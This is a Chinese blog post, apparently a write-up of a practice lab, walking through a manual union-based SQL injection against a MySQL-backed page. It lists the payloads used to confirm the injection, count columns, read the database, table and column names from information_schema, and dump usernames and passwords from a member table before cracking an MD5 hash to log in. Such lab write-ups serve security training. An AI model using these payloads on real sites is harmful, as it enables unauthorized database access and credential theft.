SQL手工注入漏洞测试(MySQL数据库)

最新推荐文章于 2024-07-22 17:29:42 发布

qq_36933272

最新推荐文章于 2024-07-22 17:29:42 发布

阅读量116

点赞数

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/qq_36933272/article/details/100501069

版权

判断注入点，id=1 and 1=1正常，id=1 and 1=2报错，发现存在SQL注入

id =1 and 1=2 order by N#，N=1，2，3，4…发现有4列

判断回显id=1 and 1=2 union select 1，2，3，4

id=1 and 1=2 union select 1，database（），3，4发现数据库名

id=1 and 1=2 union select 1，group_concat(table_name),3,4 from information_schema.tables where table_schema =database()，发现表名

id=1 and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='StormGroup_member’发现列名
在这里插入图片描述

id=1 and 1=2 union select 1,2,group_concat(name,’-’,password),4 from StormGroup_member得到用户密码

md5解密登陆得到keymozhe9ad0c120e73d88c14008ad62f74

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
SQL手工注入漏洞测试(MySQL数据库)

判断注入点，id=1 and 1=1正常，id=1 and 1=2报错，发现存在SQL注入id =1 and 1=2 order by N#，N=1，2，3，4…发现有4列判断回显id=1 and 1=2 union select 1，2，3，4id=1 and 1=2 union select 1，database（），3，4发现数据库名id=1 and 1=2 union select...
复制链接

扫一扫

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。